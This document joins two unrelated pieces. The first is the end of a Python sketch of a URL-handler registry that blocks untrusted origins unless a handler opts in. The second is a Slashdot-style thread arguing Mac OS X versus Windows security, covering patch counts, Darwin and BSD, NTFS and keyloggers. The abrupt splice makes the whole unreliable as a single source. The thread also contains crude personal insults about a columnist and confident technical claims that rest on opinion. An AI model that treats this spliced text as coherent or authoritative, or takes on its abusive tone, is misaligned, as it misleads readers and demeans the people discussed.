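    # documents until someone opts them in.
    safe_for_untrusted: bool = False


class HandlerRegistry:
    """Hypothetical registry: one table, with a per-application trust flag."""

    def __init__(self) -> None:
        self._handlers: List[Handler] = []
        # (scheme, origin, chosen app or None) for every lookup, refusals included
        self.audit: List[Tuple[str, str, Optional[str]]] = []

    def register(self, app: str, schemes: Iterable[str],
                 safe_for_untrusted: bool = False) -> None:
        self._handlers.append(
            Handler(app, frozenset(s.lower() for s in schemes), safe_for_untrusted))

    def set_safe(self, app: str, safe: bool) -> None:
        """Models the user changing the flag through a preferences pane."""
        matches = [h for h in self._handlers if h.app == app]
        if not matches:
            raise KeyError(app)
        for h in matches:
            h.safe_for_untrusted = safe

    def resolve(self, url: str, origin: Origin) -> Optional[str]:
        """Return the application to launch, or None if the request is refused."""
        scheme = urlsplit(url).scheme.lower()
        chosen = None
        for h in self._handlers:
            if not scheme or scheme not in h.schemes:
                continue
            # Untrusted content only ever reaches handlers that opted in.
            if origin is Origin.UNTRUSTED and not h.safe_for_untrusted:
                continue
            chosen = h.app
            break
        self.audit.append((scheme, origin.value, chosen))
        return chosen


def build_sample_registry() -> HandlerRegistry:
    """Constructed sample data: two legacy handlers and two that opted in."""
    reg = HandlerRegistry()
    reg.register("InternalNotesTool", ["notes"])           # legacy, flag off
    reg.register("LegacyViewer", ["doc"])                  # legacy, flag off
    reg.register("SandboxedViewer", ["doc"], safe_for_untrusted=True)
    reg.register("WebBrowser", ["http", "https"], safe_for_untrusted=True)
    return reg


if __name__ == "__main__":
    reg = build_sample_registry()
    for url, origin in [("notes://open?id=7", Origin.LOCAL),
                        ("notes://open?id=7", Origin.UNTRUSTED),
                        ("doc://report", Origin.UNTRUSTED)]:
        print(f"{origin.value:9} {url:20} -> {reg.resolve(url, origin)}")
```

Local callers resolve handlers exactly as before and never see a dialog, while a refused untrusted request leaves an audit entry instead of a prompt the user can be talked into accepting.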
You've got great points; don't get your arguments dismissed by being a Word Nazi(TM). Idiomatic expressions are an accepted part of the language and are probably the least problem we have on Slashdot when it comes to understanding posts.
Unless specifically asked, I only point out one kind of grammatical/spelling/style mistake. I point out when I can't understand what the writer was trying to say. In this case you'll note I had to use two sentences at the beginning of my reply to address multiple possible meanings of the previous author's ambiguous statement. I don't think this is unreasonable or nazi-esque. In old English, or colonial English, perhaps this had an agreed upon meaning. In modern English it does not. If the writer wanted me to know whether or not he meant "more secure" or "perfectly secure" he should have used understandable English. The purpose of writing is to communicate. If you fail to do that, your writing is flawed.
How did the keylogger start running in userspace? How did it install? If it is a malicious part of an administrator-authorized program, someone is swiftly going to get in trouble for distributing malware. I don't think you can run an unauthorized executable in userspace, except maybe for Dashboard Widgets, and they don't get access to ordinary data files.
I may be messing up the technical terms, but I don't think you can have a program running on OSX that wasn't installed by an administrator. Aside from the Kazaa-type phenomena, where massive malware is installed as a stated condition of a "free" installation of desired software, there isn't any way to get that keylogger there in the first place. And a keylogger is clearly illegal, so Kazaa-type tricks will quickly generate visits from the police for the instigators. There's probably a window of risk there, but it's a small window, high up, and throwing things at it may result in a shower of hot oil.
So far, clueless Mac users on OS9 and OSX have been just fine for years and years. I've never seen a Mac problem in my little computer shop that was caused by malware, unless you count Norton Utilities as malware.
I don't get hit running my several shop Windows PCs (yet, anyway). But I have to use antivirus, a NAT Firewall on my router, Microsoft Antispyware for 2000 and XP, and take care where I browse with the machines.
I take my home Mac anywhere, and didn't even have a router between it and the internet until I installed a wireless network (I use WEP on it--not invulnerable, but pretty effective). I often use it to check out email viruses and investigate malicious websites to figure out how my customer Windows boxen are getting infected. Four years old, zero problems with malware.
Fundamentalism is a crime against humanity
"I hope I achieved that goal, even if I did upset a lot of people who seem to feel that anything but fawning admiration for Apple is an act of betrayal by an apostate."
More than betrayal, you are verbally burned at the stake, beheaded, and then diced into tiny pieces before being fed to leeches as a puree, if you ever try to criticise apple.
I'm not such a great fan of this guy, but when he complains about windows, which he does in EVERY SINGLE OTHER ARTICLE he's written, I don't bother slashdotting him and writing about him in my blog, between the part where I describe how I went to buy the ingredients for a sandwich and the part where I describe how I made and ate the sandwich. I also don't then put an apple-voodoo curse on him either.
I realise this is probably the worst place to say this, but meh, I think I've got an addiction to getting negative points on slashdot!
Every article he does he has his god damn ugly face in looking all smug and curmudgeonly, like he's trying to say "hey, look at me, I have a column on the bbc website, and that makes me special, just like using a mac does. therefore I am infinitly bettar than you, even though in reality I am actually still a virgin and live with my mother".
I bet he cuts himself and cries in the evenings.
Not to be facetious, but that sounds like a rather accurate description of the Windows world.
... we're Apple's largest advertising force.
If we simply reported facts... how's that going to persuade anybody? We have to use hyperbole and propaganda to get people to pay attention, because Apple won't do it themselves.
Oh, and Macs don't crash, either.
Whops that's "super computer" and X11. See what using m.s. word spell check will get you?
Tired of all the isms, don't exploit people as an employer, or a government, mmmmK?
article is the assumption that Mac users are too smug over security. Where's proof for that? Just because they're demonstrably safer doesn't mean they're smug over it. Certainly, it's worth discussing the ins and outs of Mac-related safety. However you look at it though, nobody in the world knows nearly enough Mac users to call them generally smug over security issues. How would anybody know? And anyway, an article that begins with a general ad personas attack, should always be taken with caution. As for the content, others have shown that to be less than accurate. This is just a lame display of under-informed tech journalism trying to impress the ignorant.
Jesus! you must be fun at Pedantic Pursuit.
No one hears what most of us were telling to Mac users for the past 20 years... Nothing will teach them better than leaving them alone until it bites them in the ass.
It'll have to be the mother of all ass-bitings to make up for 20 years of Mac users gloating about no viruses. It'll wipe that smug smile right off their faces. Hell, maybe this hypothetical future virus will even erase all the extra productivity those jerks have enjoyed for those 20 years, with their easy to use, fully functional computers. It's been 20 years, it'll happen Any Day Now, right?
Or maybe not.
As others have also noted, there is a disconnect in your logic here. If Apple uncovers 25 potential exploits and patches 23, while MS uncovers 50 and patches 20...well, surely you get the picture.
But your logic already fails... You assume Apple patched 92% of their exploits and MS only patched 40% of their exploits.
Where do you base this argument unless you can show me where MS left 60% of any found exploits unpatched...
In fact, find even 50 exploits in XP Post SP2 for the past year...
MS has been very good about patching, and so has Apple...
But go back to MY point... If you had a choice of Boat A) and the captain found 200 holes in it and patched them all and Boat B) where the captain found 50 holes and patched them all, which boat would you assume to be safer?
Both are fully patched, but wouldn't you question the design and safety of the boat that had 200 holes in the first place?
So this is my point, in the last year OSX was boat A, and Windows was boat B...
I wasn't saying neither were unsafe or unpatched, but one HAD to be patched more than the other.
PERIOD.
Now what you suggest...
It's harder to exploit because its default behaviors are more secure.
TRUE - the Root abstraction for Users is a better method than what Windows Uses.
* Its overall design harvests security strengths from its UNIX heritage.
FALSE - Having a *nix heritage means little to NOTHING. In fact MS's NT team specifically designed NT NOT like *nix to avoid the shortcoming and security holes of the *nix model from the early 90s.
Go look up Inside Windows NT, or a book called UNIX-HATERS
Unix doesn't mean anything, there are good and bad Unix implementations, period.
PS. Windows has a full Unix Subsystem just like it has what you see as Windows the (Win32) subsystem that you can run natively on the NT kernel. Go to MS and look up UNIX. It is a free download for Win2k, XP, etc.
* Yes, its low installed base makes it a less attractive target.
This is true, this was also true of Windows NT back when Win3.1 and Win95 were being hit with a lot of viruses. Many organizations moved to the NT platform in the early 90s where this was important as the Win3.x and Win9x viruses failed on NT, and it was not a very big target for hackers of the time.
The same is true of OSX. If OSX becomes more successful as NT did by BECOMING the Only form of Windows, then OSX will have the same growing pains. (Remember Security was built into NT from the beginning, a robust C2 level of security even.)
* BUT, so does its superior security model. ^(1)
This is not so much a fact... The Root abstraction is a good model, but underlying that, the security descriptors, file system, and underlying security mechanisms are not any more robust. NT for example has a token and client/server process security model - actually fairly advanced.
Also NTFS is more robust than any file system offered by OSX, especially where integrity and security are concerned. (Truly go read up on NTFS and NT's internal Security handling.)
Take Care...
Where do you base this argument...
You completely missed the point. I provided an arithmetic case example to make a simple point regarding the insufficient logical basis for your conclusion. I was showing how your "evidence" could be factual--Apple patched more than MS--but that no conclusion regarding the relative security of each operating system may be drawn without additional factual basis. In other words, no one, including you, can draw a logical conclusion from the datapoints you used to draw a conclusion. Period.
Both are fully patched, but wouldn't you question the design and safety of the boat that had 200 holes in the first place?
Maybe. But, wouldn't you agree that the nature and severity of the holes is likely to be at least as meaningful as the quantity of patches? If one boat had 200 minor to moderate leaks but its structure was consistently seaworthy, and the other boat had 50 moderate to major leaks at chronically weak spots in its hull, I'd choose to go to sea in the first boat. No question.
If you want to judge relative security based on comparing lists of patches, you *must* include severity data, including both the potential and realized impact, and the attack vectors.
I wasn't saying neither were unsafe or unpatched, but one HAD to be patched more than the other.
Wrong. The statements "One was patched more than the other," and, "One had to be patched more than the other," are not equivalent. The number of virii, worms, and other attack vectors in the wild for Windows indicates that it was patched less than it "had to be" to be secure.
TRUE - the Root abstraction for Users is a better method than what Windows Uses.
Great! I guess we're done and you've answered your own original question then...
Or not, apparently...
FALSE - Having a *nix heritage means little to NOTHING. In fact MS's NT team specifically designed NT NOT like *nix to avoid the shortcoming and security holes of the *nix model from the early 90s.
"[OS X's] UNIX heritage," and, "all *NIX implementations," are not equivalent either. BSD is pretty universally regarded as a very secure *NIX variant, as well as an extremely secure OS compared to Windows. Hence, OS X benefits from its FreeBSD underpinnings. Period. [See how annoying that is?]
This is true, this was also true of Windows NT
You know NT. You love NT. You live NT. Fine. I get it.
This is not so much a fact...go read up...
Windows XP and OS X are the current de facto standard for PC and Mac computing, no? XP uses NTFS, which allows permission setting to the file level and encryption. OS X uses a BSD-based filesystem and CDSA to do the same things. XP Home, BTW, doesn't support encryption with NTFS, so...
And what's with XP Home and Simple File Sharing? Can't turn it off? That sucks, eh?
Refocusing now, how do you explain the 10s of thousands of exploit variants affecting Windows to the 10s of exploits affecting OS X if OS X is less secure? Answer, please.
Now, allow me a final anecdote: I just bought an ultra-cheap Dell for home use (XP Home) and set it up with an account for each family member. By default, none of the accounts even had a password. WTF? Firewalling wasn't enabled by default. W.T.F!?
Good thing I have a commercial-class firewall sitting in front of my home net.
You know what also pisses me off though? All the network-aware apps (including ipconfig.exe, ping.exe and tracert.exe) are hanging every time I run them--*except* IE, which will hum around the web just fine. But, if I boot to Safe Mode + Networking, all is well. Gyahhh!
In comparison, my Macs just f'ing worked perfectly out of the box and have never stopped. No viruses. No worms. No root-kits. No spyware beyond normal cookie crap. No wonky network problems. Nothing.
Oh well.
Happy Computing...
I apologize for not having more time, so I will just hit the couple of things that jumped off the page.
OS X benefits from its FreeBSD underpinnings
Ok, you really don't understand what you are saying, or are intentionally trying to mislead people.
OSX is NOT BSD. It is using a BSD Interface to the kernel. PERIOD.
OSX is Darwin - there really is a BIG difference, and Darwin DOES NOT inherit the security and reliability of other BSD kernel interfacing variants. This is also true that FreeBSD and OpenBSD don't inherit each other's reliability or strengths. I wish people would quit confusing this.
OS X uses a BSD-based filesystem and CDSA to do the same things.
A) No... and B) they are NOT doing the same thing. Not even remotely the same.
Using your myopic view of NTFS, I could say FAT was the same as NTFS then too, because I could use ZIP encryption/compression on FAT... Which is completely WRONG, and misleading...
There is NO FS for OSX that natively supports all the features that NTFS does 'inherently'. Sure you can add features on to other good file systems, but then it isn't just the file system you have reference anymore, but the add-on as well.
Prove me wrong, I would welcome seeing a new FS technology. Find a FS that natively supports journalling, encryption, compression, security, meta-data, and is extensible with entry point code execution.
Go look this stuff up, these forums are not Operating System Architecture 101...
PS. To get past the 'simple file sharing, and simple security' on XP Home, just boot into safe mode and log in as an administrator. You will then have the full sharing and security interface tools that are available in XP Professional, that normal home users don't really need to be playing with by default, but they are still there.
Ok, you really don't understand what you are saying, or are intentionally trying to mislead people.
I'm sure lying is not on my otherwise long list of character flaws, and I'm confident that I can hold my own with you regarding OS X, based on this thread. So, in short, I think you're wrong again.
OSX is NOT BSD. It is using a BSD Interface to the kernel. PERIOD.
OSX is Darwin - there really is a BIG difference, and Darwin DOES NOT inherit the security and reliability of other BSD kernel interfacing variants. This is also true that FreeBSD and OpenBSD don't inherit each other's reliability or strengths. I wish people would quit confusing this.
Darwin evolved from FreeBSD, which is, in fact, BSD. The industry almost ubiquitously respects BSD, in all its variants, with regard to stability and security. I don't know why you brought up OpenBSD specifically, other than you assumed incorrectly that I'm unaware of that project's highlighted focus on security beyond that of other BSD strains.
Yes, Darwin is the interface to the MACH kernel. And?
I'm no file system expert and I have no interest in becoming one. I'm a network operator, not a server or workstation guru. I've developed for OS X, and I have taken an effort, with this discussion, to study a bit of NTFS. I still haven't found anything that moves it beyond the current default OS X file system with journalling. Honestly, you probably know better, and good for you.
I have a network to tend to, so you have a good weekend and keep those servers humming. PERIOD.